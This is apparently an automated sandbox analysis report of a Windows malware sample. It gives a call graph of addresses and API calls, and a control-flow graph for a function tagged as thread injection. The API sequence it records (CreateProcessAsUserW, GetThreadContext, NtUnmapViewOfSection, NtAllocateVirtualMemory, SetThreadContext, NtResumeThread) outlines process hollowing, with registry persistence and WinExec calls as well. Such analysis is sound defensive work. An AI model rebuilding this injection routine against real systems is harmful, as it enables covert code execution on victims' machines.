37288->37289 37290 2b3b043 37289->37290 37291 2b289d0 20 API calls 37290->37291 37292 2b3b076 37291->37292 37293 2b289d0 20 API calls 37292->37293 37294 2b3b0a9 37293->37294 37295 2b289d0 20 API calls 37294->37295 37296 2b3b0dc 37295->37296 37297 2b289d0 20 API calls 37296->37297 37298 2b3b10f 37297->37298 37299 2b289d0 20 API calls 37298->37299 37300 2b3b142 37299->37300 37301 2b289d0 20 API calls 37300->37301 37302 2b3b175 37301->37302 37303 2b28338 18 API calls 37302->37303 37304 2b3b184 37303->37304 37305 2b14860 11 API calls 37304->37305 37306 2b3b1a5 37305->37306 37307 2b147ec 11 API calls 37306->37307 37308 2b3b1dc 37307->37308 37309 2b289d0 20 API calls 37308->37309 37310 2b3b200 37309->37310 37311 2b14860 11 API calls 37310->37311 37312 2b3b221 37311->37312 37313 2b147ec 11 API calls 37312->37313 37314 2b3b258 37313->37314 37315 2b289d0 20 API calls 37314->37315 37316 2b3b27c 37315->37316 37317 2b14860 11 API calls 37316->37317 37318 2b3b29d 37317->37318 37319 2b147ec 11 API calls 37318->37319 37320 2b3b2d4 37319->37320 37321 2b289d0 20 API calls 37320->37321 37322 2b3b2f8 ExitProcess 37321->37322 37324 2b2e114 37323->37324 37325 2b2e197 37324->37325 37327 2b149f8 11 API calls 37324->37327 37326 2b144dc 11 API calls 37325->37326 37328 2b2e19f 37326->37328 37327->37324 37329 2b14530 11 API calls 37328->37329 37330 2b2e1aa 37329->37330 37331 2b14500 11 API calls 37330->37331 37332 2b2e1c4 37331->37332 37332->36536 37334 2b2f22b 37333->37334 37335 2b2f256 RegOpenKeyA 37334->37335 37336 2b2f264 37335->37336 37337 2b149f8 11 API calls 37336->37337 37338 2b2f27c 37337->37338 37339 2b2f289 RegSetValueExA RegCloseKey 37338->37339 37340 2b2f2ad 37339->37340 37341 2b14500 11 API calls 37340->37341 37342 2b2f2ba 37341->37342 37343 2b144dc 11 API calls 37342->37343 37344 2b2f2c2 37343->37344 37344->36539 37346 2b2f0b9 37345->37346 37347 2b2f0e5 37346->37347 37808 2b146c4 11 API calls 37346->37808 37809 2b14530 11 API calls 37346->37809 37349 2b144dc 11 API calls 37347->37349 37350 2b2f0fa 37349->37350 37350->36797 37810 2b149a0 37352->37810 37355 2b17e71 37355->36862 37355->36865 37357 2b14bcc 11 API calls 37356->37357 37359 2b2e370 37357->37359 37358 2b2e391 37358->36960 37359->37358 37360 2b149f8 11 API calls 37359->37360 37360->37359 37362 2b2dca2 37361->37362 37812 2b14f20 37362->37812 37364 2b2dcaa 37365 2b2dcca RtlDosPathNameToNtPathName_U 37364->37365 37816 2b2dbdc 37365->37816 37367 2b2dce6 NtCreateFile 37368 2b2dd11 37367->37368 37369 2b149f8 11 API calls 37368->37369 37370 2b2dd23 NtWriteFile NtClose 37369->37370 37371 2b2dd4d 37370->37371 37817 2b14c60 37371->37817 37374 2b144dc 11 API calls 37375 2b2dd5d 37374->37375 37375->36862 37377 2b149ac 37376->37377 37378 2b149e7 37377->37378 37379 2b145a0 11 API calls 37377->37379 37382 2b28d70 37378->37382 37380 2b149c3 37379->37380 37380->37378 37381 2b12c2c 11 API calls 37380->37381 37381->37378 37383 2b28d78 37382->37383 37384 2b14860 11 API calls 37383->37384 37385 2b28dbb 37384->37385 37386 2b147ec 11 API calls 37385->37386 37387 2b28de0 37386->37387 37388 2b289d0 20 API calls 37387->37388 37389 2b28dfb 37388->37389 37390 2b14860 11 API calls 37389->37390 37391 2b28e14 37390->37391 37392 2b147ec 11 API calls 37391->37392 37393 2b28e39 37392->37393 37394 2b289d0 20 API calls 37393->37394 37395 2b28e54 37394->37395 37396 2b2a8b7 37395->37396 37397 2b14860 11 API calls 37395->37397 37398 2b14500 11 API calls 37396->37398 37401 2b28e85 37397->37401 37399 2b2a8d4 37398->37399 37400 2b14500 11 API calls 37399->37400 37402 2b2a8e4 37400->37402 37405 2b147ec 11 API calls 37401->37405 37403 2b14c60 SysFreeString 37402->37403 37404 2b2a8ef 37403->37404 37406 2b14500 11 API calls 37404->37406 37410 2b28eaa 37405->37410 37407 2b2a8ff 37406->37407 37408 2b144dc 11 API calls 37407->37408 37409 2b2a907 37408->37409 37411 2b14500 11 API calls 37409->37411 37413 2b289d0 20 API calls 37410->37413 37412 2b2a914 37411->37412 37414 2b14500 11 API calls 37412->37414 37415 2b28ec5 37413->37415 37416 2b2a921 37414->37416 37417 2b14860 11 API calls 37415->37417 37416->36707 37418 2b28ede 37417->37418 37419 2b147ec 11 API calls 37418->37419 37420 2b28f03 37419->37420 37421 2b289d0 20 API calls 37420->37421 37422 2b28f1e 37421->37422 37422->37396 37423 2b14860 11 API calls 37422->37423 37424 2b28f66 37423->37424 37425 2b147ec 11 API calls 37424->37425 37426 2b28f8b 37425->37426 37427 2b289d0 20 API calls 37426->37427 37428 2b28fa6 37427->37428 37429 2b14860 11 API calls 37428->37429 37430 2b28fbf 37429->37430 37431 2b147ec 11 API calls 37430->37431 37432 2b28fe4 37431->37432 37433 2b289d0 20 API calls 37432->37433 37434 2b28fff 37433->37434 37435 2b14860 11 API calls 37434->37435 37436 2b29044 37435->37436 37437 2b147ec 11 API calls 37436->37437 37438 2b29069 37437->37438 37439 2b289d0 20 API calls 37438->37439 37440 2b29084 37439->37440 37441 2b14860 11 API calls 37440->37441 37442 2b2909d 37441->37442 37443 2b147ec 11 API calls 37442->37443 37444 2b290c5 37443->37444 37445 2b289d0 20 API calls 37444->37445 37446 2b290e3 37445->37446 37447 2b14860 11 API calls 37446->37447 37448 2b290ff 37447->37448 37449 2b147ec 11 API calls 37448->37449 37450 2b29130 37449->37450 37451 2b289d0 20 API calls 37450->37451 37452 2b29154 37451->37452 37453 2b14860 11 API calls 37452->37453 37454 2b29170 37453->37454 37455 2b147ec 11 API calls 37454->37455 37456 2b291a1 37455->37456 37457 2b289d0 20 API calls 37456->37457 37458 2b291c5 37457->37458 37459 2b14860 11 API calls 37458->37459 37460 2b291e1 37459->37460 37461 2b147ec 11 API calls 37460->37461 37462 2b29212 37461->37462 37463 2b289d0 20 API calls 37462->37463 37464 2b29236 37463->37464 37820 2b28788 37464->37820 37467 2b292e8 37468 2b14860 11 API calls 37467->37468 37470 2b29304 37468->37470 37469 2b14860 11 API calls 37471 2b29293 37469->37471 37472 2b147ec 11 API calls 37470->37472 37473 2b147ec 11 API calls 37471->37473 37474 2b29335 37472->37474 37475 2b292c4 37473->37475 37476 2b289d0 20 API calls 37474->37476 37477 2b289d0 20 API calls 37475->37477 37478 2b29359 37476->37478 37477->37467 37479 2b289d0 20 API calls 37478->37479 37480 2b2938c 37479->37480 37481 2b14860 11 API calls 37480->37481 37482 2b293a8 37481->37482 37483 2b147ec 11 API calls 37482->37483 37484 2b293d9 37483->37484 37485 2b289d0 20 API calls 37484->37485 37486 2b293fd 37485->37486 37487 2b14860 11 API calls 37486->37487 37488 2b29419 37487->37488 37489 2b147ec 11 API calls 37488->37489 37490 2b2944a 37489->37490 37491 2b289d0 20 API calls 37490->37491 37492 2b2946e 37491->37492 37493 2b12ee0 2 API calls 37492->37493 37494 2b29473 37493->37494 37495 2b14860 11 API calls 37494->37495 37496 2b294b6 37495->37496 37497 2b147ec 11 API calls 37496->37497 37498 2b294e7 37497->37498 37499 2b289d0 20 API calls 37498->37499 37500 2b2950b 37499->37500 37501 2b14860 11 API calls 37500->37501 37502 2b29527 37501->37502 37503 2b147ec 11 API calls 37502->37503 37504 2b29558 37503->37504 37505 2b289d0 20 API calls 37504->37505 37506 2b2957c 37505->37506 37507 2b14860 11 API calls 37506->37507 37508 2b29598 37507->37508 37509 2b147ec 11 API calls 37508->37509 37510 2b295c9 37509->37510 37511 2b289d0 20 API calls 37510->37511 37512 2b295ed GetThreadContext 37511->37512 37512->37396 37513 2b2960f 37512->37513 37514 2b14860 11 API calls 37513->37514 37515 2b2962b 37514->37515 37516 2b147ec 11 API calls 37515->37516 37517 2b2965c 37516->37517 37518 2b289d0 20 API calls 37517->37518 37519 2b29680 37518->37519 37520 2b14860 11 API calls 37519->37520 37521 2b2969c 37520->37521 37522 2b147ec 11 API calls 37521->37522 37523 2b296cd 37522->37523 37524 2b289d0 20 API calls 37523->37524 37525 2b296f1 37524->37525 37526 2b14860 11 API calls 37525->37526 37527 2b2970d 37526->37527 37528 2b147ec 11 API calls 37527->37528 37529 2b2973e 37528->37529 37530 2b289d0 20 API calls 37529->37530 37531 2b29762 37530->37531 37532 2b14860 11 API calls 37531->37532 37533 2b2977e 37532->37533 37534 2b147ec 11 API calls 37533->37534 37535 2b297af 37534->37535 37536 2b289d0 20 API calls 37535->37536 37537 2b297d3 37536->37537 37538 2b14860 11 API calls 37537->37538 37539 2b297ef 37538->37539 37540 2b147ec 11 API calls 37539->37540 37541 2b29820 37540->37541 37542 2b289d0 20 API calls 37541->37542 37543 2b29844 37542->37543 37832 2b28400 37543->37832 37546 2b29878 37549 2b14860 11 API calls 37546->37549 37547 2b29b7f 37548 2b14860 11 API calls 37547->37548 37551 2b29b9b 37548->37551 37550 2b29894 37549->37550 37553 2b147ec 11 API calls 37550->37553 37552 2b147ec 11 API calls 37551->37552 37554 2b29bcc 37552->37554 37555 2b298c5 37553->37555 37556 2b289d0 20 API calls 37554->37556 37557 2b289d0 20 API calls 37555->37557 37558 2b29b78 37556->37558 37559 2b298e9 37557->37559 37560 2b14860 11 API calls 37558->37560 37561 2b14860 11 API calls 37559->37561 37563 2b29c0c 37560->37563 37562 2b29905 37561->37562 37564 2b147ec 11 API calls 37562->37564 37565 2b147ec 11 API calls 37563->37565 37567 2b29936 37564->37567 37566 2b29c3d 37565->37566 37568 2b289d0 20 API calls 37566->37568 37569 2b289d0 20 API calls 37567->37569 37570 2b29c61 37568->37570 37571 2b2995a 37569->37571 37572 2b14860 11 API calls 37570->37572 37573 2b14860 11 API calls 37571->37573 37574 2b29c7d 37572->37574 37575 2b29976 37573->37575 37577 2b147ec 11 API calls 37574->37577 37576 2b147ec 11 API calls 37575->37576 37579 2b299a7 37576->37579 37578 2b29cae 37577->37578 37580 2b289d0 20 API calls 37578->37580 37581 2b289d0 20 API calls 37579->37581 37582 2b29cd2 37580->37582 37583 2b299cb 37581->37583 37584 2b14860 11 API calls 37582->37584 37846 2b28670 37583->37846 37591 2b29cee 37584->37591 37587 2b299e3 37589 2b27a2c 18 API calls 37587->37589 37588 2b29a0b 37590 2b14860 11 API calls 37588->37590 37592 2b29a04 37589->37592 37595 2b29a27 37590->37595 37593 2b147ec 11 API calls 37591->37593 37594 2b14860 11 API calls 37592->37594 37598 2b29d1f 37593->37598 37597 2b29a98 37594->37597 37596 2b147ec 11 API calls 37595->37596 37602 2b29a58 37596->37602 37600 2b147ec 11 API calls 37597->37600 37599 2b289d0 20 API calls 37598->37599 37601 2b29d43 37599->37601 37606 2b29ac9 37600->37606 37603 2b27a2c 18 API calls 37601->37603 37605 2b289d0 20 API calls 37602->37605 37604 2b29d64 37603->37604 37604->37396 37607 2b14860 11 API calls 37604->37607 37605->37592 37608 2b289d0 20 API calls 37606->37608 37611 2b29d92 37607->37611 37609 2b29aed 37608->37609 37610 2b14860 11 API calls 37609->37610 37613 2b29b09 37610->37613 37612 2b147ec 11 API calls 37611->37612 37615 2b29dc3 37612->37615 37614 2b147ec 11 API calls 37613->37614 37618 2b29b3a 37614->37618 37616 2b289d0 20 API calls 37615->37616 37617 2b29de7 37616->37617 37619 2b14860 11 API calls 37617->37619 37620 2b289d0 20 API calls 37618->37620 37623 2b29e03 37619->37623 37621 2b29b5e 37620->37621 37860 2b27a2c 37621->37860 37624 2b147ec 11 API calls 37623->37624 37625 2b29e34 37624->37625 37626 2b289d0 20 API calls 37625->37626 37627 2b29e58 37626->37627 37874 2b28c80 37627->37874 37629 2b14860 11 API calls 37631 2b29edf 37629->37631 37630 2b29e5f 37630->37629 37632 2b147ec 11 API calls 37631->37632 37633 2b29f10 37632->37633 37634 2b289d0 20 API calls 37633->37634 37635 2b29f34 37634->37635 37636 2b14860 11 API calls 37635->37636 37637 2b29f50 37636->37637 37638 2b147ec 11 API calls 37637->37638 37639 2b29f81 37638->37639 37640 2b289d0 20 API calls 37639->37640 37641 2b29fa5 37640->37641 37642 2b14860 11 API calls 37641->37642 37643 2b29fc1 37642->37643 37644 2b147ec 11 API calls 37643->37644 37645 2b29ff2 37644->37645 37646 2b289d0 20 API calls 37645->37646 37647 2b2a016 37646->37647 37648 2b27d78 18 API calls 37647->37648 37649 2b2a033 37648->37649 37650 2b14860 11 API calls 37649->37650 37651 2b2a04f 37650->37651 37652 2b147ec 11 API calls 37651->37652 37653 2b2a080 37652->37653 37654 2b289d0 20 API calls 37653->37654 37655 2b2a0a4 37654->37655 37656 2b14860 11 API calls 37655->37656 37657 2b2a0c0 37656->37657 37658 2b147ec 11 API calls 37657->37658 37659 2b2a0f1 37658->37659 37660 2b289d0 20 API calls 37659->37660 37661 2b2a115 37660->37661 37662 2b14860 11 API calls 37661->37662 37663 2b2a131 37662->37663 37664 2b147ec 11 API calls 37663->37664 37665 2b2a162 37664->37665 37666 2b289d0 20 API calls 37665->37666 37667 2b2a186 37666->37667 37668 2b27d78 18 API calls 37667->37668 37669 2b2a1a6 37668->37669 37670 2b14860 11 API calls 37669->37670 37671 2b2a1c2 37670->37671 37672 2b147ec 11 API calls 37671->37672 37673 2b2a1f3 37672->37673 37674 2b289d0 20 API calls 37673->37674 37675 2b2a217 37674->37675 37676 2b14860 11 API calls 37675->37676 37677 2b2a233 37676->37677 37678 2b147ec 11 API calls 37677->37678 37679 2b2a264 37678->37679 37680 2b289d0 20 API calls 37679->37680 37681 2b2a288 37680->37681 37682 2b14860 11 API calls 37681->37682 37683 2b2a2a4 37682->37683 37684 2b147ec 11 API calls 37683->37684 37685 2b2a2d5 37684->37685 37686 2b289d0 20 API calls 37685->37686 37687 2b2a2f9 SetThreadContext NtResumeThread 37686->37687 37688 2b14860 11 API calls 37687->37688 37689 2b2a345 37688->37689 37690 2b147ec 11 API calls 37689->37690 37691 2b2a376 37690->37691 37692 2b289d0 20 API calls 37691->37692 37693 2b2a39a 37692->37693 37694 2b14860 11 API calls 37693->37694 37695 2b2a3b6 37694->37695 37696 2b147ec 11 API calls 37695->37696 37697 2b2a3e7 37696->37697 37698 2b289d0 20 API calls 37697->37698 37699 2b2a40b 37698->37699 37700 2b14860 11 API calls 37699->37700 37701 2b2a427 37700->37701 37702 2b147ec 11 API calls 37701->37702 37703 2b2a458 37702->37703 37704 2b289d0 20 API calls 37703->37704 37705 2b2a47c 37704->37705 37706 2b14860 11 API calls 37705->37706 37707 2b2a498 37706->37707 37708 2b147ec 11 API calls 37707->37708 37709 2b2a4c9 37708->37709 37710 2b289d0 20 API calls 37709->37710 37711 2b2a4ed 37710->37711 37712 2b12c2c 11 API calls 37711->37712 37713 2b2a4fc 37712->37713 37714 2b14860 11 API calls 37713->37714 37715 2b2a51e 37714->37715 37716 2b147ec 11 API calls 37715->37716 37717 2b2a54f 37716->37717 37718 2b289d0 20 API calls 37717->37718 37719 2b2a573 37718->37719 37720 2b2894c 21 API calls 37719->37720 37721 2b2a587 37720->37721 37722 2b2894c 21 API calls 37721->37722 37723 2b2a59b 37722->37723 37724 2b2894c 21 API calls 37723->37724 37725 2b2a5af 37724->37725 37726 2b14860 11 API calls 37725->37726 37727 2b2a5cb 37726->37727 37728 2b147ec 11 API calls 37727->37728 37729 2b2a5fc 37728->37729 37730 2b289d0 20 API calls 37729->37730 37731 2b2a620 37730->37731 37732 2b2894c 21 API calls 37731->37732 37733 2b2a634 37732->37733 37734 2b2894c 21 API calls 37733->37734 37735 2b2a648 37734->37735 37736 2b14860 11 API calls 37735->37736 37737 2b2a664 37736->37737 37738 2b147ec 11 API calls 37737->37738 37739 2b2a682 37738->37739 37740 2b2894c 21 API calls 37739->37740 37741 2b2a69a 37740->37741 37742 2b14860 11 API calls 37741->37742 37743 2b2a6b6 37742->37743 37744 2b147ec 11 API calls 37743->37744 37745 2b2a6d4 37744->37745 37746 2b2894c 21 API calls 37745->37746 37747 2b2a6ec 37746->37747 37748 2b2894c 21 API calls 37747->37748 37749 2b2a700 37748->37749 37750 2b2894c 21 API calls 37749->37750 37751 2b2a714 37750->37751 37752 2b2894c 21 API calls 37751->37752 37753 2b2a728 37752->37753 37754 2b2894c 21 API calls 37753->37754 37755 2b2a73c 37754->37755 37756 2b14860 11 API calls 37755->37756 37757 2b2a758 37756->37757 37758 2b147ec 11 API calls 37757->37758 37759 2b2a776 37758->37759 37760 2b2894c 21 API calls 37759->37760 37761 2b2a78e 37760->37761 37762 2b14860 11 API calls 37761->37762 37763 2b2a7aa 37762->37763 37764 2b147ec 11 API calls 37763->37764 37765 2b2a7c8 37764->37765 37766 2b2894c 21 API calls 37765->37766 37767 2b2a7e0 37766->37767 37768 2b14860 11 API calls 37767->37768 37769 2b2a7fc 37768->37769 37770 2b147ec 11 API calls 37769->37770 37771 2b2a81a 37770->37771 37772 2b2894c 21 API calls 37771->37772 37773 2b2a832 37772->37773 37774 2b14860 11 API calls 37773->37774 37775 2b2a84e 37774->37775 37776 2b147ec 11 API calls 37775->37776 37777 2b2a86c 37776->37777 37778 2b2894c 21 API calls 37777->37778 37779 2b2a884 37778->37779 37780 2b2894c 21 API calls 37779->37780 37781 2b2a8a3 37780->37781 37782 2b2894c 21 API calls 37781->37782 37782->37396 37784 2b14530 11 API calls 37783->37784 37785 2b285df 37784->37785 37786 2b14860 11 API calls 37785->37786 37787 2b285fe 37786->37787 37788 2b281cc 17 API calls 37787->37788 37789 2b28611 37788->37789 37790 2b28274 15 API calls 37789->37790 37791 2b28617 WinExec 37790->37791 37792 2b28639 37791->37792 37793 2b144dc 11 API calls 37792->37793 37794 2b28641 37793->37794 37794->36637 37795->36696 37796->36853 37797->36906 37798->37030 37799->36860 37800->36953 37802 2b28973 GetProcAddress 37801->37802 37803 2b289bb 37801->37803 37804 2b289b0 FreeLibrary 37802->37804 37805 2b2898d 37802->37805 37803->37153 37804->37803 37806 2b27d78 18 API calls 37805->37806 37807 2b289a5 37806->37807 37807->37804 37808->37346 37809->37346 37811 2b149a4 GetFileAttributesA 37810->37811 37811->37355 37813 2b14f26 SysAllocStringLen 37812->37813 37814 2b14f3c 37812->37814 37813->37814 37815 2b14c30 37813->37815 37814->37364 37815->37812 37816->37367 37818 2b14c74 37817->37818 37819 2b14c66 SysFreeString 37817->37819 37818->37374 37819->37818 37821 2b14530 11 API calls 37820->37821 37822 2b287ab 37821->37822 37823 2b14860 11 API calls 37822->37823 37824 2b287ca 37823->37824 37825 2b281cc 17 API calls 37824->37825 37826 2b287dd 37825->37826 37827 2b28274 15 API calls 37826->37827 37828 2b287e3 CreateProcessAsUserW 37827->37828 37829 2b28827 37828->37829 37830 2b144dc 11 API calls 37829->37830 37831 2b2882f 37830->37831 37831->37467 37831->37469 37833 2b14530 11 API calls 37832->37833 37834 2b28425 37833->37834 37835 2b2798c 12 API calls 37834->37835 37836 2b28432 37835->37836 37837 2b147ec 11 API calls 37836->37837 37838 2b2843f 37837->37838 37839 2b281cc 17 API calls 37838->37839 37840 2b28452 37839->37840 37841 2b28274 15 API calls 37840->37841 37842 2b28458 NtReadVirtualMemory 37841->37842 37843 2b28486 37842->37843 37844 2b14500 11 API calls 37843->37844 37845 2b28493 37844->37845 37845->37546 37845->37547 37847 2b14530 11 API calls 37846->37847 37848 2b28695 37847->37848 37849 2b2798c 12 API calls 37848->37849 37850 2b286a2 37849->37850 37851 2b147ec 11 API calls 37850->37851 37852 2b286af 37851->37852 37853 2b281cc 17 API calls 37852->37853 37854 2b286c2 37853->37854 37855 2b28274 15 API calls 37854->37855 37856 2b286c8 NtUnmapViewOfSection 37855->37856 37857 2b286e8 37856->37857 37858 2b14500 11 API calls 37857->37858 37859 2b286f5 37858->37859 37859->37587 37859->37588 37861 2b14530 11 API calls 37860->37861 37862 2b27a51 37861->37862 37863 2b2798c 12 API calls 37862->37863 37864 2b27a5e 37863->37864 37865 2b147ec 11 API calls 37864->37865 37866 2b27a6b 37865->37866 37867 2b281cc 17 API calls 37866->37867 37868 2b27a7e 37867->37868 37869 2b28274 15 API calls 37868->37869 37870 2b27a84 NtAllocateVirtualMemory 37869->37870 37871 2b27ab5 37870->37871 37872 2b14500 11 API calls 37871->37872 37873 2b27ac2 37872->37873 37873->37558 37875 2b12c10 11 API calls 37874->37875 37876 2b28cb6 37875->37876 37876->37630 37877 2b14edc 37878 2b14ee9 37877->37878 37882 2b14ef0 37877->37882 37883 2b14c38 37878->37883 37889 2b14c50 37882->37889 37884 2b14c4c 37883->37884 37885 2b14c3c SysAllocStringLen 37883->37885 37884->37882 37885->37884 37886 2b14c30 37885->37886 37887 2b14f26 SysAllocStringLen 37886->37887 37888 2b14f3c 37886->37888 37887->37886 37887->37888 37888->37882 37890 2b14c56 SysFreeString 37889->37890 37891 2b14c5c 37889->37891 37890->37891 37892 2b11c6c 37893 2b11d04 37892->37893 37894 2b11c7c 37892->37894 37897 2b11f58 37893->37897 37898 2b11d0d 37893->37898 37895 2b11cc0 37894->37895 37896 2b11c89 37894->37896 37903 2b11724 10 API calls 37895->37903 37899 2b11c94 37896->37899 37940 2b11724 37896->37940 37900 2b11fec 37897->37900 37905 2b11f68 37897->37905 37906 2b11fac 37897->37906 37901 2b11d25 37898->37901 37902 2b11e24 37898->37902 37907 2b11d2c 37901->37907 37912 2b11d48 37901->37912 37914 2b11dfc 37901->37914 37918 2b11e55 Sleep 37902->37918 37919 2b11e7c 37902->37919 37920 2b11e95 37902->37920 37908 2b11cd7 37903->37908 37910 2b11724 10 API calls 37905->37910 37909 2b11fb2 37906->37909 37913 2b11724 10 API calls 37906->37913 37927 2b11a8c 8 API calls 37908->37927 37930 2b11cfd 37908->37930 37931 2b11f82 37910->37931 37911 2b11724 10 API calls 37929 2b11f2c 37911->37929 37921 2b11d79 Sleep 37912->37921 37923 2b11d9c 37912->37923 37932 2b11fc1 37913->37932 37916 2b11724 10 API calls 37914->37916 37915 2b11ca1 37928 2b11cb9 37915->37928 37964 2b11a8c 37915->37964 37934 2b11e05 37916->37934 37917 2b11fa7 37918->37919 37924 2b11e6f Sleep 37918->37924 37919->37911 37919->37920 37922 2b11d91 Sleep 37921->37922 37921->37923 37922->37912 37924->37902 37926 2b11e1d 37927->37930 37929->37920 37933 2b11a8c 8 API calls 37929->37933 37931->37917 37935 2b11a8c 8 API calls 37931->37935 37932->37917 37936 2b11a8c 8 API calls 37932->37936 37937 2b11f50 37933->37937 37934->37926 37938 2b11a8c 8 API calls 37934->37938 37935->37917 37939 2b11fe4 37936->37939 37938->37926 37941 2b11968 37940->37941 37942 2b1173c 37940->37942 37943 2b11a80 37941->37943 37944 2b11938 37941->37944 37951 2b117cb Sleep 37942->37951 37952 2b1174e 37942->37952 37945 2b11684 VirtualAlloc 37943->37945 37946 2b11a89 37943->37946 37950 2b11947 Sleep 37944->37950 37957 2b11986 37944->37957 37948 2b116bf 37945->37948 37949 2b116af 37945->37949 37946->37915 37947 2b1175d 37947->37915 37948->37915 37981 2b11644 37949->37981 37954 2b1195d Sleep 37950->37954 37950->37957 37951->37952 37955 2b117e4 Sleep 37951->37955 37952->37947 37958 2b1180a Sleep 37952->37958 37961 2b1182c 37952->37961 37954->37944 37955->37942 37956 2b119a4 37956->37915 37957->37956 37959 2b115cc VirtualAlloc 37957->37959 37960 2b11820 Sleep 37958->37960 37958->37961 37959->37956 37960->37952 37963 2b11838 37961->37963 37987 2b115cc 37961->37987 37963->37915 37965 2b11aa1 37964->37965 37966 2b11b6c 37964->37966 37968 2b11aa7 37965->37968 37969 2b11b13 Sleep 37965->37969 37967 2b116e8 37966->37967 37966->37968 37971 2b11c66 37967->37971 37974 2b11644 2 API calls 37967->37974 37970 2b11ab0 37968->37970 37973 2b11b4b Sleep 37968->37973 37978 2b11b81 37968->37978 37969->37968 37972 2b11b2d Sleep 37969->37972 37970->37928 37971->37928 37972->37965 37976 2b11b61 Sleep 37973->37976 37973->37978 37975 2b116f5 VirtualFree 37974->37975 37977 2b1170d 37975->37977 37976->37968 37977->37928 37979 2b11c00 VirtualFree 37978->37979 37980 2b11ba4 37978->37980 37979->37928 37980->37928 37982 2b11681 37981->37982 37983 2b1164d 37981->37983 37982->37948 37983->37982 37984 2b1164f Sleep 37983->37984 37985 2b11664 37984->37985 37985->37982 37986 2b11668 Sleep 37985->37986 37986->37983 37991 2b11560 37987->37991 37989 2b115d4 VirtualAlloc 37990 2b115eb 37989->37990 37990->37963 37992 2b11500 37991->37992 37992->37989 37993 2b3d2fc 38003 2b1656c 37993->38003 37997 2b3d32a 38008 2b3c35c timeSetEvent 37997->38008 37999 2b3d334 38000 2b3d342 GetMessageA 37999->38000 38001 2b3d352 38000->38001 38002 2b3d336 TranslateMessage DispatchMessageA 38000->38002 38002->38000 38004 2b16577 38003->38004 38009 2b14198 38004->38009 38007 2b142ac SysFreeString SysReAllocStringLen SysAllocStringLen 38007->37997 38008->37999 38010 2b141de 38009->38010 38011 2b14257 38010->38011 38012 2b143e8 38010->38012 38023 2b14130 38011->38023 38015 2b14419 38012->38015 38016 2b1442a 38012->38016 38028 2b1435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38015->38028 38019 2b1446f FreeLibrary 38016->38019 38020 2b14493 38016->38020 38018 2b14423 38018->38016 38019->38016 38021 2b144a2 ExitProcess 38020->38021 38022 2b1449c 38020->38022 38022->38021 38024 2b14173 38023->38024 38025 2b14140 38023->38025 38024->38007 38025->38024 38027 2b115cc VirtualAlloc 38025->38027 38029 2b15868 38025->38029 38027->38025 38028->38018 38030 2b15878 GetModuleFileNameA 38029->38030 38032 2b15894 38029->38032 38033 2b15acc GetModuleFileNameA RegOpenKeyExA 38030->38033 38032->38025 38034 2b15b4f 38033->38034 38035 2b15b0f RegOpenKeyExA 38033->38035 38051 2b15908 12 API calls 38034->38051 38035->38034 38036 2b15b2d RegOpenKeyExA 38035->38036 38036->38034 38038 2b15bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 38036->38038 38042 2b15cf2 38038->38042 38043 2b15c0f 38038->38043 38039 2b15b74 RegQueryValueExA 38040 2b15b94 RegQueryValueExA 38039->38040 38041 2b15bb2 RegCloseKey 38039->38041 38040->38041 38041->38032 38042->38032 38043->38042 38044 2b15c1f lstrlenA 38043->38044 38046 2b15c37 38044->38046 38046->38042 38047 2b15c84 38046->38047 38048 2b15c5c lstrcpynA LoadLibraryExA 38046->38048 38047->38042 38049 2b15c8e lstrcpynA LoadLibraryExA 38047->38049 38048->38047 38049->38042 38050 2b15cc0 lstrcpynA LoadLibraryExA 38049->38050 38050->38042 38051->38039

                                                                                                                  Executed Functions

                                                                                                                  Function 02B28D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 6027 2b28d70-2b28d73 6028 2b28d78-2b28d7d 6027->6028 6028->6028 6029 2b28d7f-2b28e66 call 2b14990 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6028->6029 6060 2b2a8b7-2b2a921 call 2b14500 * 2 call 2b14c60 call 2b14500 call 2b144dc call 2b14500 * 2 6029->6060 6061 2b28e6c-2b28f47 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6029->6061 6061->6060 6105 2b28f4d-2b29275 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b130d4 * 2 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14de0 call 2b14df0 call 2b28788 6061->6105 6214 2b29277-2b292e3 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6105->6214 6215 2b292e8-2b29609 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b12ee0 call 2b12f08 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 GetThreadContext 6105->6215 6214->6215 6215->6060 6323 2b2960f-2b29872 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec 